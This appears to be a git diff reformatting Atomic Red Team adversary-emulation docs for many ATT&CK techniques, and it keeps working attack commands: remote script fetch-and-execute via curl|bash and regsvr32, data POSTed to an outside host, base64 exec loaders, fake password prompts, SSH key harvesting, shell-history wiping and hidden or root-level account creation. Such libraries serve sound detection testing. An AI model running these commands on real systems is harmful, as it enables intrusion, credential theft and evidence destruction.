@@ -73,8 +71,7 @@ Use xwd command to collect a full desktop screenshot and review file with xwud
 | output_file | xxx | Path | desktop.xwd|
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
 xwd -root -out #{output_file} xwud -in #{output_file}
 ```
@@ -93,8 +90,7 @@ Use import command to collect a full desktop screenshot
 | output_file | xxx | Path | desktop.png|
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ```
 import -window root
 ```
diff --git a/atomics/T1114/T1114.md b/atomics/T1114/T1114.md
index 555a6561..b010105c 100644
--- a/atomics/T1114/T1114.md
+++ b/atomics/T1114/T1114.md
@@ -21,8 +21,7 @@ Search through local Outlook installation, extract mail, compress the contents,
 **Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 Display email contents in the terminal PS C:\> .\Get-Inbox.ps1
diff --git a/atomics/T1115/T1115.md b/atomics/T1115/T1115.md
index d19b23f9..a7bbce56 100644
--- a/atomics/T1115/T1115.md
+++ b/atomics/T1115/T1115.md
@@ -25,8 +25,7 @@ Add data to clipboard to copy off or execute commands from.
 **Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 dir | clip clip < readme.txt
 ```
@@ -39,8 +38,7 @@ Utilize PowerShell to echo a command to clipboard and execute it
 **Supported Platforms:** Windows
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
 echo Get-Process | clip Get-Clipboard | iex
 ```
diff --git a/atomics/T1117/T1117.md b/atomics/T1117/T1117.md
index c6c237ae..feba33a3 100644
--- a/atomics/T1117/T1117.md
+++ b/atomics/T1117/T1117.md
@@ -30,8 +30,7 @@ Regsvr32.exe is a command-line program used to register and unregister OLE contr
 |------|-------------|------|---------------|
 | filename | Name of the local file, include path. | Path | C:\AtomicRedTeam\atomics\T1117\RegSvr32.sct|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 regsvr32.exe /s /u /i:#(unknown) scrobj.dll
 ```
@@ -48,8 +47,7 @@ Regsvr32.exe is a command-line program used to register and unregister OLE contr
 |------|-------------|------|---------------|
 | url | URL to hosted sct file | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 regsvr32.exe /s /u /i:#{url} scrobj.dll
 ```
@@ -66,8 +64,7 @@ Regsvr32.exe is a command-line program used to register and unregister OLE contr
 |------|-------------|------|---------------|
 | dll_name | Name of DLL to Execute, DLL Should export DllRegisterServer | Path | C:\AtomicRedTeam\atomics\T1117\bin\AllTheThingsx86.dll|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 "IF "%PROCESSOR_ARCHITECTURE%"=="AMD64" (C:\Windows\syswow64\regsvr32.exe /s #{dll_name}) ELSE ( regsvr32.exe /s #{dll_name} )"
 ```
diff --git a/atomics/T1118/T1118.md b/atomics/T1118/T1118.md
index 147e1b2e..940ac5a1 100644
--- a/atomics/T1118/T1118.md
+++ b/atomics/T1118/T1118.md
@@ -24,8 +24,7 @@ Executes the Uninstall Method
 |------|-------------|------|---------------|
 | filename | location of the payload | Path | C:\AtomicRedTeam\atomics\T1118\src\T1118.dll|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library /out:C:\AtomicRedTeam\atomics\T1118\src\T1118.dll C:\AtomicRedTeam\atomics\T1118\src\T1118.cs C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U #(unknown)
 ```
@@ -43,8 +42,7 @@ Executes the Uninstall Method
 |------|-------------|------|---------------|
 | filename | location of the payload | Path | C:\AtomicRedTeam\atomics\T1118\src\T1118.dll|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /target:library /out:C:\AtomicRedTeam\atomics\T1118\src\T1118.dll C:\AtomicRedTeam\atomics\T1118\src\T1118.cs C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /? #(unknown)
 ```
diff --git a/atomics/T1119/T1119.md b/atomics/T1119/T1119.md
index f4ff6359..f5644b27 100644
--- a/atomics/T1119/T1119.md
+++ b/atomics/T1119/T1119.md
@@ -19,8 +19,7 @@ Automated Collection
 **Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 dir c: /b /s .docx | findstr /e .docx for /R c: %f in (*.docx) do copy %f c:\temp\
 ```
@@ -33,8 +32,7 @@ Automated Collection
 **Supported Platforms:** Windows
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
 Get-ChildItem -Recurse -Include *.doc | % {Copy-Item $_.FullName -destination c:\temp}
 ```
diff --git a/atomics/T1121/T1121.md b/atomics/T1121/T1121.md
index cb09261a..574af610 100644
--- a/atomics/T1121/T1121.md
+++ b/atomics/T1121/T1121.md
@@ -25,8 +25,7 @@ Executes the Uninstall Method, No Admin Rights Required
 | file_name | Location of the payload | Path | T1121.dll|
 | source_file | Location of the CSharp source_file | Path | C:\AtomicRedTeam\atomics\T1121\src\T1121.cs|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /r:System.EnterpriseServices.dll /target:library #{source_file} C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U #{file_name} del #{file_name}
@@ -46,8 +45,7 @@ Executes the Uninstall Method, No Admin Rights Required, Requires SNK
 | file_name | Location of the payload | Path | T1121.dll|
 | source_file | Location of the CSharp source_file | Path | C:\AtomicRedTeam\atomics\T1121\src\T1121.cs|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ```
 $key = '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' $Content = [System.Convert]::FromBase64String($key) Set-Content key.snk -Value $Content -Encoding Byte
diff --git a/atomics/T1122/T1122.md b/atomics/T1122/T1122.md
index e252d504..82bcad69 100644
--- a/atomics/T1122/T1122.md
+++ b/atomics/T1122/T1122.md
@@ -15,8 +15,7 @@ Hijack COM Object used by certutil.exe
 **Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ```
 reg import ..\src\COMHijack.reg certutil.exe -CAInfo reg import ..\src\COMHijackCleanup.reg
diff --git a/atomics/T1123/T1123.md b/atomics/T1123/T1123.md
index a15b88cc..da5bd268 100644
--- a/atomics/T1123/T1123.md
+++ b/atomics/T1123/T1123.md 
@@ -25,8 +25,7 @@ Create a file called test.wma, with the duration of 30 seconds | output_file | Path to the recording file being captured | Path | test.wma| | duration_hms | Duration of audio to be recorded (in h:m:s format) | Path | 30|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ``` SoundRecorder /FILE #{output_file} /DURATION #{duration_hms} ```
@@ -38,8 +37,7 @@ SoundRecorder /FILE #{output_file} /DURATION #{duration_hms} **Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ``` powershell.exe -Command WindowsAudioDevice-Powershell-Cmdlet ```
diff --git a/atomics/T1124/T1124.md b/atomics/T1124/T1124.md
index 018d215e..baf90010 100644
--- a/atomics/T1124/T1124.md
+++ b/atomics/T1124/T1124.md
@@ -24,8 +24,7 @@ Identify the system time |------|-------------|------|---------------| | computer_name | computer name to query | string | computer1|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ``` net time \\#{computer_name} w32tm /tz ```
@@ -38,8 +37,7 @@ Identify the system time via PowerShell **Supported Platforms:** Windows
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ``` Get-Date ```
diff --git a/atomics/T1126/T1126.md b/atomics/T1126/T1126.md
index 4093e693..864ae9de 100644
--- a/atomics/T1126/T1126.md
+++ b/atomics/T1126/T1126.md
@@ -26,8 +26,7 @@ Add a Network Share utilizing the command_prompt |------|-------------|------|---------------| | share_name | Share to add. | string | \\test\share|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ``` net use c: #{share_name} net share test=#{share_name} /REMARK:"test share" /CACHE:No ```
@@ -45,8 +44,7 @@ Removes a Network Share utilizing the command_prompt |------|-------------|------|---------------| | share_name | Share to remove. | string | \\test\share|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ``` net share #{share_name} /delete ```
@@ -63,8 +61,7 @@ Removes a Network Share utilizing PowerShell |------|-------------|------|---------------| | share_name | Share to remove. | string | \\test\share|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ``` Remove-SmbShare -Name #{share_name} Remove-FileShare -Name #{share_name} ```
diff --git a/atomics/T1127/T1127.md b/atomics/T1127/T1127.md
index 024c9d09..946a087a 100644
--- a/atomics/T1127/T1127.md
+++ b/atomics/T1127/T1127.md
@@ -52,8 +52,7 @@ Executes the code in a project file using. C# Example |------|-------------|------|---------------| | filename | Location of the project file | Path | T1127.csproj|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ``` C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe #(unknown) ```
diff --git a/atomics/T1128/T1128.md b/atomics/T1128/T1128.md
index 36a75917..41717a40 100644
--- a/atomics/T1128/T1128.md
+++ b/atomics/T1128/T1128.md
@@ -24,8 +24,7 @@ Netsh interacts with other operating system components using dynamic-link librar |------|-------------|------|---------------| | helper_file | Path to DLL | Path | C:\Path\file.dll|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ``` netsh.exe add helper #{helper_file} ```
diff --git a/atomics/T1130/T1130.md b/atomics/T1130/T1130.md
index 7f5938ff..09ba3e87 100644
--- a/atomics/T1130/T1130.md
+++ b/atomics/T1130/T1130.md
@@ -29,8 +29,7 @@ Creates a root CA with openssl | key_filename | Key we create that is used to create the CA certificate | Path | rootCA.key| | cert_filename | Path of the CA certificate we create | Path | rootCA.crt|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ``` openssl genrsa -out #{key_filename} 4096 openssl req -x509 -new -nodes -key #{key_filename} -sha256 -days 365 -out #{cert_filename}
diff --git a/atomics/T1132/T1132.md b/atomics/T1132/T1132.md
index 9f787156..02c2487c 100644
--- a/atomics/T1132/T1132.md
+++ b/atomics/T1132/T1132.md
@@ -21,8 +21,7 @@ Utilizing a common technique for posting base64 encoded data. | destination_url | Destination URL to post encoded data. | string | redcanary.com| | base64_data | Encoded data to post using fake Social Security number 111-11-1111. | string | MTExLTExLTExMTE=|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ``` echo -n 111-11-1111 | base64 curl -XPOST #{base64_data}.#{destination_url} ```
diff --git a/atomics/T1134/T1134.md b/atomics/T1134/T1134.md
index d800911d..88041e05 100644
--- a/atomics/T1134/T1134.md
+++ b/atomics/T1134/T1134.md
@@ -35,8 +35,7 @@ Requires Administrator Privileges To Execute Test |------|-------------|------|---------------| | target_user | Username To Steal Token From | String | SYSTEM|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ``` #list processes by user, $owners = @{}
diff --git a/atomics/T1135/T1135.md b/atomics/T1135/T1135.md
index 04f1b719..66fc9d61 100644
--- a/atomics/T1135/T1135.md
+++ b/atomics/T1135/T1135.md
@@ -36,8 +36,7 @@ Network Share Discovery |------|-------------|------|---------------| | computer_name | Computer name to find a mount on. | string | computer1|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ``` df -aH smbutil view -g //#{computer_name} showmount #{computer_name}
@@ -56,8 +55,7 @@ Network Share Discovery utilizing the command prompt |------|-------------|------|---------------| | computer_name | Computer name to find a mount on. | string | computer1|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ``` net view \\#{computer_name} ```
@@ -74,8 +72,7 @@ Network Share Discovery utilizing PowerShell |------|-------------|------|---------------| | computer_name | Computer name to find a mount on. | string | computer1|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ``` net view \\#{computer_name} get-smbshare -Name #{computer_name} ```
diff --git a/atomics/T1136/T1136.md b/atomics/T1136/T1136.md
index a696863c..ac02069b 100644
--- a/atomics/T1136/T1136.md
+++ b/atomics/T1136/T1136.md
@@ -31,8 +31,7 @@ Create a user via useradd | username | Username of the user to create | String | evil_user| | comment | Comment to record when creating the user | String | Evil Account|
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ``` useradd -M -N -r -s /bin/bash -c "#{comment}" #{username} ```
@@ -50,8 +49,7 @@ Creates a user on a MacOS system with dscl | username | Username of the user to create | String | evil_user| | realname | 'realname' to record when creating the user | String | Evil Account|
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ``` dscl . -create /Users/#{username} dscl . -create /Users/#{username} UserShell /bin/bash dscl . -create /Users/#{username} RealName "#{realname}"
@@ -73,8 +71,7 @@ Creates a new user in a command prompt |------|-------------|------|---------------| | username | Username of the user to create | String | Evil Account|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ``` net user /add #{username} ```
@@ -91,8 +88,7 @@ Creates a new user in PowerShell |------|-------------|------|---------------| | username | Username of the user to create | String | Evil Account|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ``` New-LocalUser -Name #{username} -NoPassword net user /add #{username} ```
@@ -111,8 +107,7 @@ Creates a new user in Linux and adds the user to the `root` group. This techniqu | username | Username of the user to create | String | butter| | password | Password of the user to create | String | BetterWithButter|
-#### Run it with `bash`!
-```
+#### Run it with `bash`! ``` useradd -o -u 0 -g 0 -M -d /root -s /bin/bash #{username} echo "#{password}" | passwd --stdin #{username} ```
diff --git a/atomics/T1137/T1137.md b/atomics/T1137/T1137.md
index 9e4c5da7..03073720 100644
--- a/atomics/T1137/T1137.md
+++ b/atomics/T1137/T1137.md
@@ -58,8 +58,7 @@ Word VBA Macro **Supported Platforms:** Windows
-#### Run it with these steps!
-1. Open Word
+#### Run it with these steps! 1. Open Word 2. Insert tab -> Quick Parts -> Field
diff --git a/atomics/T1138/T1138.md b/atomics/T1138/T1138.md
index ee5354a1..92348bd7 100644
--- a/atomics/T1138/T1138.md
+++ b/atomics/T1138/T1138.md
@@ -36,8 +36,7 @@ place to start. |------|-------------|------|---------------| | file_path | Path to the shim databaase file | String | C:\AtomicRedTeam\atomics\T1138\src\AtomicShimx86.sdb|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ``` sdbinst.exe #{file_path} sdbinst.exe -u #{file_path} ```
diff --git a/atomics/T1139/T1139.md b/atomics/T1139/T1139.md
index 3097ce34..94087c72 100644
--- a/atomics/T1139/T1139.md
+++ b/atomics/T1139/T1139.md
@@ -22,8 +22,7 @@ xxxx | bash_history_grep_args | grep arguments that filter out specific commands we want to capture | Path | -e '-p ' -e 'pass' -e 'ssh'| | output_file | Path where captured results will be placed | Path | ~/loot.txt|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ``` cat #{bash_history_filename} | grep #{bash_history_grep_args} > #{output_file} ```
diff --git a/atomics/T1140/T1140.md b/atomics/T1140/T1140.md
index 06c3d588..4434a757 100644
--- a/atomics/T1140/T1140.md
+++ b/atomics/T1140/T1140.md
@@ -28,8 +28,7 @@ Encode/Decode executable |------|-------------|------|---------------| | executable | name of executable | path | c:\file.exe|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ``` certutil.exe -encode #{executable} file.txt certutil.exe -decode file.txt #{executable} ```
@@ -47,8 +46,7 @@ Rename certutil and decode a file. This is in reference to latest research by Fi |------|-------------|------|---------------| | executable | name of executable/file to decode | path | c:\file.exe|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ``` cmd.exe /c copy %windir%\\system32\\certutil.exe %temp%tcm.tmp cmd.exe /c %temp%tcm.tmp -decode #{executable} file.txt ```
diff --git a/atomics/T1141/T1141.md b/atomics/T1141/T1141.md
index f0e57adc..0ef81bf2 100644
--- a/atomics/T1141/T1141.md
+++ b/atomics/T1141/T1141.md
@@ -20,8 +20,7 @@ Reference: http://fuzzynop.blogspot.com/2014/10/osascript-for-local-phishing.htm **Supported Platforms:** macOS
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ``` osascript -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to activate' -e 'tell app "System Preferences" to display dialog "Software Update requires that you type your password to apply changes." & return & return default answer "" with icon 1 with hidden answer with title "Software Update"' ```
@@ -35,8 +34,7 @@ Reference: https://github.com/nathanlopez/Stitch/blob/master/PyLib/askpass.py **Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ``` powershell.exe -command {$cred = $host.UI.PromptForCredential('Windows Security Update', '',[Environment]::UserName, [Environment]::UserDomainName); echo $cred.GetNetworkCredential().Password;} ```
diff --git a/atomics/T1142/T1142.md b/atomics/T1142/T1142.md
index 92e64cf0..c17dc5e0 100644
--- a/atomics/T1142/T1142.md
+++ b/atomics/T1142/T1142.md
@@ -27,8 +27,7 @@ To manage their credentials, users have to use additional credentials to access **Supported Platforms:** macOS
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ``` security -h security find-certificate -a -p > allcerts.pem security import /tmp/certs.pem -k
diff --git a/atomics/T1144/T1144.md b/atomics/T1144/T1144.md
index 38d30726..9f3bd167 100644
--- a/atomics/T1144/T1144.md
+++ b/atomics/T1144/T1144.md
@@ -24,8 +24,7 @@ Gatekeeper Bypass via command line |------|-------------|------|---------------| | app_path | Path to app to be used | Path | myapp.app|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ``` sudo xattr -r -d com.apple.quarantine #{app_path} sudo spctl --master-disable ```
diff --git a/atomics/T1145/T1145.md b/atomics/T1145/T1145.md
index ca7e31da..61780990 100644
--- a/atomics/T1145/T1145.md
+++ b/atomics/T1145/T1145.md
@@ -29,8 +29,7 @@ File extensions include: .key, .pgp, .gpg, .ppk., .p12, .pem, pfx, .cer, .p7b, . **Supported Platforms:** Windows
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ``` echo "ATOMICREDTEAM" > %windir%\cert.key dir c:\ /b /s .key | findstr /e .key ```
@@ -48,8 +47,7 @@ Discover private SSH keys on a macOS or Linux system. |------|-------------|------|---------------| | output_file | Output file containing locations of SSH key files | path | /tmp/keyfile_locations.txt|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ``` find / -name id_rsa >> #{output_file} find / -name id_dsa >> #{output_file} ```
@@ -67,8 +65,7 @@ Copy private SSH keys on a Linux system to a staging folder using the `cp` comma |------|-------------|------|---------------| | output_folder | Output folder containing copies of SSH private key files | path | /tmp/art-staging|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ``` mkdir #{output_folder} find / -name id_rsa -exec cp --parents {} #{output_folder} \; find / -name id_dsa -exec cp --parents {} #{output_folder} \;
@@ -87,8 +84,7 @@ Copy private SSH keys on a Linux or macOS system to a staging folder using the ` |------|-------------|------|---------------| | output_folder | Output folder containing copies of SSH private key files | path | /tmp/art-staging|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ``` mkdir #{output_folder} find / -name id_rsa -exec rsync -R {} #{output_folder} \; find / -name id_dsa -exec rsync -R {} #{output_folder} \;
diff --git a/atomics/T1146/T1146.md b/atomics/T1146/T1146.md
index 30302a12..8a928645 100644
--- a/atomics/T1146/T1146.md
+++ b/atomics/T1146/T1146.md
@@ -25,8 +25,7 @@ Clears bash history via rm **Supported Platforms:** Linux, macOS
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ``` rm ~/.bash_history ```
@@ -38,8 +37,7 @@ Clears bash history via rm **Supported Platforms:** Linux, macOS
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ``` echo "" > ~/.bash_history ```
@@ -51,8 +49,7 @@ Clears bash history via cat /dev/null **Supported Platforms:** Linux, macOS
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ``` cat /dev/null > ~/.bash_history ```
@@ -64,8 +61,7 @@ Clears bash history via a symlink to /dev/null **Supported Platforms:** Linux, macOS
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ``` ln -sf /dev/null ~/.bash_history ```
@@ -77,8 +73,7 @@ Clears bash history via truncate **Supported Platforms:** Linux
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ``` truncate -s0 ~/.bash_history ```
@@ -90,8 +85,7 @@ Clears the history of a bunch of different shell types by setting the history si **Supported Platforms:** Linux, macOS
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ``` unset HISTFILE export HISTFILESIZE=0 history -c
diff --git a/atomics/T1147/T1147.md b/atomics/T1147/T1147.md
index b70b2c8a..bf4d0884 100644
--- a/atomics/T1147/T1147.md
+++ b/atomics/T1147/T1147.md
@@ -20,8 +20,7 @@ Add a hidden user on MacOS |------|-------------|------|---------------| | user_name | username to add | string | APT|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ``` sudo dscl . -create /Users/#{user_name} UniqueID 333 ```
diff --git a/atomics/T1148/T1148.md b/atomics/T1148/T1148.md
index f91f71ff..898b2636 100644
--- a/atomics/T1148/T1148.md
+++ b/atomics/T1148/T1148.md
@@ -22,8 +22,7 @@ Disables history collection in shells |------|-------------|------|---------------| | evil_command | Command to run after shell history collection is disabled | String | whoami|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ``` export HISTCONTROL=ignoreboth ls #{evil_command} ```
@@ -36,8 +35,7 @@ xxx **Supported Platforms:** macOS, Linux
-#### Run it with these steps!
-1. export HISTCONTROL=ignoreboth
+#### Run it with these steps! 1. export HISTCONTROL=ignoreboth 2. echo export "HISTCONTROL=ignoreboth" >> ~/.bash_profile 3. ls 4. whoami > recon.txt
diff --git a/atomics/T1150/T1150.md b/atomics/T1150/T1150.md
index dd7c9b94..66a2ae33 100644
--- a/atomics/T1150/T1150.md
+++ b/atomics/T1150/T1150.md
@@ -16,8 +16,7 @@ Modify MacOS plist file in one of two directories **Supported Platforms:** macOS
-#### Run it with these steps!
-1. Modify a .plist in
+#### Run it with these steps! 1. Modify a .plist in /Library/Preferences
diff --git a/atomics/T1151/T1151.md b/atomics/T1151/T1151.md
index d8b93332..2d783174 100644
--- a/atomics/T1151/T1151.md
+++ b/atomics/T1151/T1151.md
@@ -17,8 +17,7 @@ Space After Filename **Supported Platforms:** macOS
-#### Run it with these steps!
-1. echo '#!/bin/bash\necho "print \"hello, world!\"" | /usr/bin/python\nexit' > execute.txt && chmod +x execute.txt
+#### Run it with these steps! 1. echo '#!/bin/bash\necho "print \"hello, world!\"" | /usr/bin/python\nexit' > execute.txt && chmod +x execute.txt 2. mv execute.txt "execute.txt "
diff --git a/atomics/T1152/T1152.md b/atomics/T1152/T1152.md
index 79b0ace6..c3f45a96 100644
--- a/atomics/T1152/T1152.md
+++ b/atomics/T1152/T1152.md
@@ -17,8 +17,7 @@ Utilize launchctl **Supported Platforms:** macOS
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ``` launchctl submit -l evil -- /Applications/Calculator.app/Contents/MacOS/Calculator ```
diff --git a/atomics/T1153/T1153.md b/atomics/T1153/T1153.md
index b3acc2e5..7e727d4d 100644
--- a/atomics/T1153/T1153.md
+++ b/atomics/T1153/T1153.md
@@ -19,8 +19,7 @@ Creates a script and executes it using the source command **Supported Platforms:** macOS, Linux
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ``` sh -c "echo 'echo Hello from the Atomic Red Team' > /tmp/art.sh" chmod +x /tmp/art.sh source /tmp/art.sh
@@ -34,8 +33,7 @@ Creates a script and executes it using the source command's dot alias **Supported Platforms:** macOS, Linux
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ``` sh -c "echo 'echo Hello from the Atomic Red Team' > /tmp/art.sh" chmod +x /tmp/art.sh . /tmp/art.sh
diff --git a/atomics/T1154/T1154.md b/atomics/T1154/T1154.md
index ba1a1319..77f82572 100644
--- a/atomics/T1154/T1154.md
+++ b/atomics/T1154/T1154.md
@@ -17,8 +17,7 @@ After sending a keyboard interrupt (CTRL+C) the script will download and execute **Supported Platforms:** macOS, CentOS, Ubuntu, Linux
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ``` trap 'nohup curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1154/echo-art-fish.sh | bash' EXIT exit trap 'nohup curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1154/echo-art-fish.sh | bash' INT
diff --git a/atomics/T1155/T1155.md b/atomics/T1155/T1155.md
index 08cefc48..cd8c0306 100644
--- a/atomics/T1155/T1155.md
+++ b/atomics/T1155/T1155.md
@@ -22,8 +22,7 @@ https://github.com/EmpireProject/Empire **Supported Platforms:** macOS
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ``` osascript "do shell script "echo \"import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('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'));\" | python &"" ```
diff --git a/atomics/T1156/T1156.md b/atomics/T1156/T1156.md
index 1d81f042..f0fae3f9 100644
--- a/atomics/T1156/T1156.md
+++ b/atomics/T1156/T1156.md
@@ -26,8 +26,7 @@ Adds a command to the .bash_profile file of the current user |------|-------------|------|---------------| | command_to_add | Command to add to the .bash_profile file | string | /path/to/script.py|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ``` echo "#{command_to_add}" >> ~/.bash_profile ```
@@ -44,8 +43,7 @@ Adds a command to the .bashrc file of the current user |------|-------------|------|---------------| | command_to_add | Command to add to the .bashrc file | string | /path/to/script.py|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ``` echo "#{command_to_add}" >> ~/.bashrc ```
diff --git a/atomics/T1158/T1158.md b/atomics/T1158/T1158.md
index f74d5e1c..18029818 100644
--- a/atomics/T1158/T1158.md
+++ b/atomics/T1158/T1158.md
@@ -52,8 +52,7 @@ Creates a hidden file inside a hidden directory **Supported Platforms:** Linux, macOS
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ``` mkdir .hidden-directory echo "this file is hidden" > .hidden-directory/.hidden-file ```
@@ -66,8 +65,7 @@ Hide a file on MacOS **Supported Platforms:** macOS
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ``` sudo xattr -lr * / 2>&1 /dev/null | grep -C 2 "00 00 00 00 00 00 00 00 40 00 FF FF FF FF 00 00" ```
@@ -85,8 +83,7 @@ mv file to a .file | filename | path of file to hide | path | /tmp/evil| | output_filename | output path of file | path | /tmp/evil|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ``` mv #(unknown) .#{output_filename} ```
@@ -103,8 +100,7 @@ Creates a file and marks it as a system file using the attrib.exe utility. |------|-------------|------|---------------| | filename | path of file to mark as system | path | C:\Windows\Temp\sensitive_file.txt|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ``` attrib.exe +s #(unknown) ```
@@ -121,8 +117,7 @@ Creates a file and marks it as hidden using the attrib.exe utility. |------|-------------|------|---------------| | filename | path of file to mark as hidden | path | C:\Windows\Temp\sensitive_file.txt|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ``` attrib.exe +h #(unknown) ```
@@ -139,8 +134,7 @@ Requires Apple Dev Tools |------|-------------|------|---------------| | filename | path of file to hide | path | /tmp/evil|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ``` setfile -a V #(unknown) ```
@@ -157,8 +151,7 @@ Hide a directory on MacOS |------|-------------|------|---------------| | filename | path of file to hide | path | /tmp/evil|
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ``` chflags hidden #(unknown) ```
@@ -170,8 +163,7 @@ Show all hidden files on MacOS **Supported Platforms:** macOS
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ``` defaults write com.apple.finder AppleShowAllFiles YES ```
@@ -183,8 +175,7 @@ Create visible directories on MacOS and Linux **Supported Platforms:** macOS, Linux
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ``` mkdir visible-directory echo "this file is visible" > visible-directory/visible-file ls
@@ -199,8 +190,7 @@ Create hidden directories and files on Nix platforms **Supported Platforms:** macOS, Linux
-#### Run it with `sh`!
-```
+#### Run it with `sh`! ``` mkdir .hidden-directory echo "this file is hidden" > .hidden-directory/.hidden-file ls -la
@@ -221,8 +211,7 @@ Create an Alternate Data Stream with the command prompt. Write access is require | file_name | File name of file to create ADS on. | string | test.txt| | ads_filename | Name of ADS file. | string | adstest.txt|
-#### Run it with `command_prompt`!
-```
+#### Run it with `command_prompt`! ``` echo "test" > #{file_name}:#{ads_filename} echo "test" > :#{ads_filename} dir /s /r | find ":$DATA"
@@ -242,8 +231,7 @@ Create an Alternate Data Stream with PowerShell. Write access is required. | file_name | File name of file to create ADS on. | string | test.txt| | ads_filename | Name of ADS file. | string | adstest.txt|
-#### Run it with `powershell`!
-```
+#### Run it with `powershell`! ``` echo "test" > #{file_name} | set-content -path test.txt -stream #{ads_filename} -value "test" set-content -path #{file_name} -stream #{ads_filename} -value "test2" set-content -path . -stream #{ads_filename} -value "test3"
diff --git a/atomics/T1159/T1159.md b/atomics/T1159/T1159.md
index fbdfa811..c6719a73 100644
--- a/atomics/T1159/T1159.md
+++ b/atomics/T1159/T1159.md
@@ -17,8 +17,7 @@ Create a plist and execute it **Supported Platforms:** macOS
-#### Run it with these steps!
-1. Create file - .client
+#### Run it with these steps! 1. Create file - .client 2. osascript -e 'tell app "Finder" to display dialog "Hello World"'
diff --git a/atomics/T1160/T1160.md b/atomics/T1160/T1160.md
index 6c5f7fb5..b68acc20 100644
--- a/atomics/T1160/T1160.md
+++ b/atomics/T1160/T1160.md
@@ -19,8 +19,7 @@ Utilize LaunchDaemon to launch `Hello World` **Supported Platforms:** macOS
-#### Run it with these steps!
-1. Place the following file (com.example.hello) in /System/Library/LaunchDaemons or /Library/LaunchDaemons
